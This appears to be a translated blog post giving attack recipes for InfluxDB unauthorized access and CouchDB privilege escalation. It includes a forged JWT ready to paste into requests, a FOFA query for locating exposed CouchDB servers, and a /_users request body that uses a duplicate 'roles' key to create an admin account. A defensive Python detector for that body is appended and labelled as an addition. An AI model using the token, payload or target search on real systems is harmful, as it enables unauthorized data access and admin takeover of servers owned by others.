InfluxDB Unauthorized Access & CouchDB Privilege Bypass
2022-07-24 07:17:00 【无聊的知识】

InfluxDB - Unauthorized access
Default ports: 8086, 8088
Use https://jwt.io/ to generate a JWT token:



Capture the request when logging in,
then add one more part to the request data:
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJpYXQiOjE2NzEyNTIxMjN9.Y9i99OpSWOInZqmBpQAvr2ymmsWG2dZZDYkz9RzrCk0

At this point the data can be queried.

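CouchDB - Privilege bypass
You can try it with FOFA like this
The version should preferably be no higher than 1.7.0
"CouchDB" && port="5984"
Unauthorized access
Append the following to the address:
_utils/#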


There is another method, which requires capturing the request.
Two things need to be added to the request:

/_users/org.couchdb.user:vulhub
{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "roles": [],
  "password": "123456"
}
When we send the request and see an OK in the response,
the user has probably been added successfully.
You can then try logging in.
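
A detection-side view of the request body above, as an added example that is not part of the original post: the body repeats the "roles" key, so a check that parses it the ordinary way only sees the last value, and the duplicates have to be inspected before they are collapsed. The helper names, the path prefix constant and the benign sample are assumptions made for this illustration.

```python
import json

# Constructed samples: the first mirrors the request body shown above,
# the second is an ordinary user document (name and password are made up).
SUSPICIOUS_BODY = """{
  "type": "user", "name": "vulhub",
  "roles": ["_admin"], "roles": [],
  "password": "123456"
}"""
BENIGN_BODY = '{"type": "user", "name": "alice", "roles": [], "password": "x"}'

USER_DOC_PREFIX = "/_users/org.couchdb.user:"


def naive_roles(body):
    """What a check sees if it parses normally: Python keeps the LAST duplicate."""
    return json.loads(body).get("roles")


def inspect_user_doc(path, body):
    """Return findings for a body sent to a _users document (hypothetical helper)."""
    if not path.startswith(USER_DOC_PREFIX):
        return []
    objects = []  # key/value pairs of every JSON object, duplicates preserved
    def keep_pairs(pairs):
        objects.append(pairs)
        return dict(pairs)

    try:
        json.loads(body, object_pairs_hook=keep_pairs)
    except ValueError:
        return ["unparseable JSON body"]

    findings = []
    for pairs in objects:
        keys = [k for k, _ in pairs]
        for dup in sorted({k for k in keys if keys.count(k) > 1}):
            findings.append(f"duplicate key: {dup}")
        for key, value in pairs:
            if key == "roles" and isinstance(value, list) and "_admin" in value:
                findings.append("roles requests _admin")
    return findings


if __name__ == "__main__":
    print(naive_roles(SUSPICIOUS_BODY))
    print(inspect_user_doc(USER_DOC_PREFIX + "vulhub", SUSPICIOUS_BODY))
    print(inspect_user_doc(USER_DOC_PREFIX + "alice", BENIGN_BODY))
```

Run over proxy or access logs that record request bodies, a duplicate-key finding on a _users document is worth an alert on its own, whatever the roles values are.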
